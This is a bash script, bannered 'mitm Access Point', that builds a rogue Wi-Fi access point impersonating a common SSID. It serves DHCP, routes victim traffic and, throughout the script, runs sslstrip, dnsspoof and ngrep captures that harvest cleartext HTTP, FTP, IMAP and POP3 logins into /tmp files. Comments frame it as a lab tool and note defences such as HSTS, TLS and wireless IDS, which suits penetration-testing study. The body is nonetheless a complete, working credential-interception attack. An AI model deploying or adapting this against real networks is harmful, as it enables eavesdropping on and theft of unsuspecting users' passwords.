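#!/bin/bash
###########################################################################################################
#---------------------------- Configuration Stuff --------------------------------------------------------#
###########################################################################################################
# Settings for a lab soft access point: the advertised network name, the
# interfaces involved, the addressing plan handed out over DHCP and the
# capture files written by the logging step. Every later section reads
# these globals, so values are edited here and nowhere else.
ESSID=linksys # default value... can be changed at runtime with -e <ssid>
MON=mon0      # wireless interface; the splash screen asks to confirm it is in monitor mode
CHAN=6        # channel the soft access point is started on
INT=eth1      # uplink interface, used as the NAT (MASQUERADE) output interface
# First default-route next hop of this host; it is only displayed on the
# splash screen. awk stops at the first match, so no extra `head` is needed.
GATEWAY=$(/sbin/ip route | awk '/default/ { print $3; exit }')
# Strip SSL? Modify arguments or comment out to disable
# (later sections test whether SSLSTRIP is set at all, not whether it is empty).
# The trailing space is required: the command is run as $SSLSTRIP$SSTRIPARGS.
SSLSTRIP="python /pentest/web/sslstrip/sslstrip.py "
SSTRIPARGS="-f -a -w /tmp/sslstrip"
#---------------------------------
# Addressing plan for clients that associate with the soft access point.
IPSTART=10.0.0.16
IPEND=10.0.0.55
ROUTER=10.0.0.1
SUBNET=10.0.0.0
BROADCAST=10.0.0.0
NETMASK=255.255.255.0
DNS=10.0.0.1
# dhcpd configuration kept as one string with literal "\n" sequences; it is
# expanded into real newlines by `echo -e` when the file is written.
DHCP="authoritative;\n\
ddns-update-style ad-hoc;\n\
subnet $SUBNET netmask $NETMASK {\n\
allow unknown-clients;\n\
default-lease-time 600;\n\
max-lease-time 7200;\n\
option subnet-mask $NETMASK;\n\
option broadcast-address $BROADCAST;\n\
option routers $ROUTER;\n\
option domain-name-servers $DNS;\n\
range dynamic-bootp $IPSTART $IPEND;\n\
}"
# Password Logging
# NOTE(review): these captures and /tmp/sslstrip hold whatever credentials
# crossed the link in cleartext, and they sit under fixed names in /tmp.
# On a shared host a private directory (mktemp -d, mode 0700) keeps them
# away from other local users; treat the files as sensitive test data.
HTTPLOG=/tmp/http.pcap
FTPLOG=/tmp/ftp.pcap
POP3LOG=/tmp/pop3.pcap
IMAPLOG=/tmp/imap.pcap
#--------------------------- END OF CONFIGURATION ----------------------------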
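##-- Handle Arguments
# Optional "-e <ssid>" overrides the default ESSID from the configuration
# block. The operands are quoted and defaulted so that running the script
# with no arguments no longer makes `[` fail with "unary operator expected",
# and "-e" without a value leaves the default ESSID in place instead of
# blanking it.
if [ "${1:-}" = "-e" ] && [ -n "${2:-}" ]; then
  ESSID=$2
fi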
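###########################################################################################################
#----------------------------- Splash Screen -------------------------------------------------------------#
###########################################################################################################
# Prints the banner and the effective configuration, then blocks until the
# operator presses Enter. Nothing is changed on the host before that point,
# so this is the last place to abort with CTRL-C.
echo -e "\033[31;4m \033[0m"
echo -e "\033[31;4m*******************************************************************\033[0m"
echo -e "\033[29;1m _ __ \033[0m"
echo -e "\033[29;1m ____ ___ (_) /_____ ___ \033[0m"
echo -e "\033[29;1m / __ \`__ \/ / __/ __ \`__ \ \033[0m"
echo -e "\033[29;1m / / / / / / / /_/ / / / / /\033[0m"
echo -e "\033[29;1m /_/ /_/ /_/_/\__/_/ /_/ /_/ \033[0m"
echo -e "\033[29;1m ___ ______ _ _ \033[0m"
echo -e "\033[29;1m / _ \ | ___ \ (_) | | \033[0m"
echo -e "\033[29;1m / /_\ \ ___ ___ ___ ___ ___ | |_/ /__ _ _ __ | |_ \033[0m"
echo -e "\033[29;1m | _ |/ __/ __/ _ \/ __/ __| | __/ _ \| | '_ \| __| \033[0m"
echo -e "\033[29;1m | | | | (_| (_| __/\__ \__ \ | | | (_) | | | | | |_ \033[0m"
echo -e "\033[29;1m \_| |_/\___\___\___||___/___/ \_| \___/|_|_| |_|\__| \033[0m"
echo -e "\033[31;1m \033[0m"
echo -e " \033[31;4mCurrent Configuration:\033[0m"
echo -e "\033[31;1m ESSID: \033[34;1m$ESSID\033[31;1m Channel:\033[34;1m$CHAN\033[31;1m \033[0m"
echo -e "\033[31;1m Bridged Interface: \033[34;1m$INT\033[31;1m \033[0m"
echo -e "\033[31;1m Default Gateway: \033[34;1m$GATEWAY\033[31;1m \033[0m"
echo -e "\033[31;1m DHCP Range: \033[34;1m$IPSTART\033[31;1m - \033[34;1m$IPEND\033[31;1m \033[0m"
echo -e "\033[31;1m Soft-Router IP: \033[34;1m$ROUTER\033[31;1m \033[0m"
echo -e "\033[31;1m Subnet: \033[34;1m$SUBNET\033[31;1m Broadcast: \033[34;1m$BROADCAST\033[31;1m \033[0m"
# The label colour is restored after $NETMASK so that "DNS:" is printed like
# every other label (it previously inherited the value colour).
echo -e "\033[31;1m Netmask: \033[34;1m$NETMASK\033[31;1m DNS: \033[34;1m$DNS\033[31;1m \033[0m"
# ${SSLSTRIP+x} expands to "x" whenever SSLSTRIP is set, even to an empty
# string, so only commenting the assignment out reports "No" here.
if [ -n "${SSLSTRIP+x}" ]; then
  echo -e "\033[31;1m Strip SSL: \033[34;1mYes\033[31;1m Args: \033[34;1m$SSTRIPARGS\033[31;1m \033[0m"
else
  echo -e "\033[31;1m Strip SSL: \033[34;1mNo \033[0m"
fi
echo ""
echo -e "\033[29;1m !!!!! Confirm wifi card is in monitor mode at $MON !!!!!! \033[0m"
echo -e "\033[31;1m CTRL-C to Cancel \033[0m"
echo -e "\033[32;1m Press Enter to continue... \033[0m"
echo -e "\033[31;4m \033[0m"
echo -e "\033[31;4m******************************************************************\033[0m"
# -r keeps backslashes in the typed line literal; the input itself is discarded.
read -r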
###########################################################################################################
#------------------------------ Running Commands ---------------------------------------------------------#
###########################################################################################################
# Brings the lab environment up in a fixed order: soft access point, tap
# interface, routing/NAT, DHCP, optional HTTP interception, traffic capture.
# The order matters: at0 only exists once airbase-ng is running, and the
# DHCP server and captures bind to at0.

# Prints one green progress line.
status() {
  echo -e "\033[32;1m$1\033[0m"
}

# Starts one background ngrep on at0.
#   $1 - pcap file to write, $2 - case-insensitive match expression, $3 - TCP port
start_capture() {
  ngrep -O $1 -d at0 -i "$2" tcp port $3 > /dev/null&
}

status "Starting fake accesspoint with ESSID $ESSID"
# airbase-ng advertises $ESSID on channel $CHAN through $MON; -w sets a fixed
# WEP key. From the client side this is an access point whose only identity
# is its name: devices that auto-join remembered open or WEP networks by
# SSID are the ones exposed. A wireless IDS can flag a known SSID announced
# from an unknown BSSID, and WPA2/WPA3-Enterprise clients that validate the
# server certificate will refuse to complete the association.
#gnome-terminal -e "airbase-ng -c $CHAN -e $ESSID $MON"
gnome-terminal -e "airbase-ng -w 01234ABCD0 -c $CHAN -e $ESSID $MON"
# Fixed wait for airbase-ng to create the at0 tap interface.
sleep 5

status "Configuring Tap Interface at0"
ifconfig at0 up
ifconfig at0 $ROUTER netmask $NETMASK
ifconfig at0 mtu 1400

status "Setting up forwarding and routing"
route add -net $SUBNET netmask $NETMASK gw $ROUTER
# Turns this host into a router for the whole machine, not only for at0.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Client traffic leaves through $INT with this host's address as source.
iptables -t nat -A POSTROUTING -o $INT -j MASQUERADE
iptables -A FORWARD -i at0 -j ACCEPT
# Every UDP/53 packet is rewritten to one resolver address. The address is
# hard-coded here rather than taken from the configuration block.
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.200.2

status "Starting DHCP Server on at0"
# The host's existing dhcpd configuration is moved aside (to /etc, not
# /etc/dhcp3) and replaced by the generated one.
mv /etc/dhcp3/dhcpd.conf /etc/dhcpd.conf.old
echo -e $DHCP > /etc/dhcp3/dhcpd.conf
killall dhcpd3 &> /dev/null
gnome-terminal -e "dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0"

# Runs only when SSLSTRIP is set in the configuration block.
if [ -n "${SSLSTRIP+x}" ]; then
  status "Starting SSL Strip"
  # Plain HTTP (TCP/80) is redirected to local port 10000, where the proxy
  # started on the next line is expected to listen. Only requests that start
  # as plaintext HTTP reach it: sites served with HSTS (in particular
  # preloaded ones) and browsers in HTTPS-only mode never send that first
  # plaintext request.
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  $SSLSTRIP$SSTRIPARGS &> /dev/null &
  status "Starting DNS Spoofing on at0"
  /usr/local/sbin/dnsspoof -i at0 &> /dev/null &
fi

status "Logging packet captures containing credentials"
# Each capture matches cleartext protocol commands only. Services reached
# over TLS (HTTPS, FTPS/SFTP, IMAPS, POP3S) do not expose these strings, so
# enforcing the TLS variants is the mitigation on the client side.
start_capture "$HTTPLOG" '^(GET|POST)' 80
start_capture "$FTPLOG" '^(USER|PASS)' 21
start_capture "$IMAPLOG" '^(a login )' 143
start_capture "$POP3LOG" '^(USER|PASS)' 110
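###########################################################################################################
#---------------------------------------Cleanup Stuff-----------------------------------------------------#
###########################################################################################################
# Waits for Enter, stops every helper process started earlier and puts the
# host's networking and DHCP configuration back.
echo -e "\033[31;1m*******************************************************************\033[0m"
echo -e "\033[31;1m Press Enter to Gracefully Exit\033[0m"
echo -e "\033[31;1m*******************************************************************\033[0m"
read -r
killall ngrep > /dev/null
killall airbase-ng
killall dhcpd3
if [ -n "${SSLSTRIP+x}" ]; then
  # pkill matches on the full command line and never selects itself; the
  # earlier `ps aux | grep -m 1` pipeline could pick up the grep process
  # instead of the proxy and leave it running.
  pkill -f "python /pentest/web/sslstrip/sslstrip.py" #kill sslstrip
  killall dnsspoof #kill dnsspoof
fi
# Put back the dhcpd configuration that was moved aside at start-up; without
# this the generated lab configuration stays installed on the host.
if [ -f /etc/dhcpd.conf.old ]; then
  mv -f /etc/dhcpd.conf.old /etc/dhcp3/dhcpd.conf
fi
# Reset networking stuff
# NOTE(review): the flushes below remove every rule and user chain in the
# filter and nat tables, including any firewall the host had before the
# script ran, and forwarding is forced off regardless of its earlier state.
# Re-apply the host's normal ruleset afterwards if it had one.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward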